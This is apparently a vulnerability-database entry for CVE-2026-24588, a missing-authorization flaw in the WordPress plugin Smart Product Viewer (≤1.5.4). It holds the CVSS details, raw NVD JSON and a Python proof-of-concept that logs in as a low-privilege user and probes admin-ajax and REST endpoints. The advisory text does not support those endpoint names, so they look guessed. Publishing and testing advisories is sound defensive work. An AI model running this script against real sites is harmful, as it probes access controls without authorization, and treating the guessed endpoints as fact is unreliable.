Security Vulnerability Report
中文
CVE-2026-24588 CVSS 4.3 MEDIUM

CVE-2026-24588

Published: 2026-01-23 15:16:17
Last Modified: 2026-04-28 15:16:17

Description

Missing Authorization vulnerability in topdevs Smart Product Viewer smart-product-viewer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Smart Product Viewer: from n/a through <= 1.5.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Smart Product Viewer (smart-product-viewer) <= 1.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-24588 PoC - Missing Authorization in Smart Product Viewer # Target: WordPress site with vulnerable Smart Product Viewer plugin (<=1.5.4) TARGET_URL = "http://target-wordpress-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def get_wordpress_nonce(url, cookie=None): """Fetch a valid nonce from the target site""" response = requests.get(f"{url}/wp-admin/", cookies=cookie) if response.status_code == 200: import re nonce_match = re.search(r'data-nonce="([a-z0-9]+)"', response.text) if nonce_match: return nonce_match.group(1) return None def login_wordpress(url, username, password): """Authenticate as low-privilege user""" session = requests.Session() login_url = f"{url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{url}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data) return session if 'wordpress_logged_in' in str(session.cookies) else None def exploit_missing_auth(session, target_url): """ Exploit the missing authorization vulnerability. Attackers can access admin functions as low-privilege user. """ # Try to access product viewer settings/admin functions vulnerable_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php?action=spv_admin_action", f"{target_url}/wp-admin/admin-ajax.php?action=get_smart_product_data", f"{target_url}/wp-json/smart-product-viewer/v1/settings" ] results = [] for endpoint in vulnerable_endpoints: response = session.get(endpoint) if response.status_code == 200: results.append({ 'endpoint': endpoint, 'status': 'VULNERABLE', 'response_preview': response.text[:500] }) return results def main(): print("[*] CVE-2026-24588 PoC - Smart Product Viewer Missing Authorization") print("[*] Target:", TARGET_URL) # Step 1: Login as low-privilege user print("\n[1] Authenticating as low-privilege user...") session = login_wordpress(TARGET_URL, USERNAME, PASSWORD) if not session: print("[-] Authentication failed") return print("[+] Authentication successful") # Step 2: Exploit missing authorization print("\n[2] Testing for missing authorization vulnerability...") results = exploit_missing_auth(session, TARGET_URL) if results: print("[!] VULNERABLE - Found unprotected endpoints:") for result in results: print(f" - {result['endpoint']}") print(f" Response: {result['response_preview']}") else: print("[-] No vulnerable endpoints found (may be patched)") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24588", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:16.803", "lastModified": "2026-04-28T15:16:17.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in topdevs Smart Product Viewer smart-product-viewer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Smart Product Viewer: from n/a through <= 1.5.4."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en topdevs Smart Product Viewer smart-product-viewer permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Smart Product Viewer: desde n/a hasta &lt;= 1.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/smart-product-viewer/vulnerability/wordpress-smart-product-viewer-plugin-1-5-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}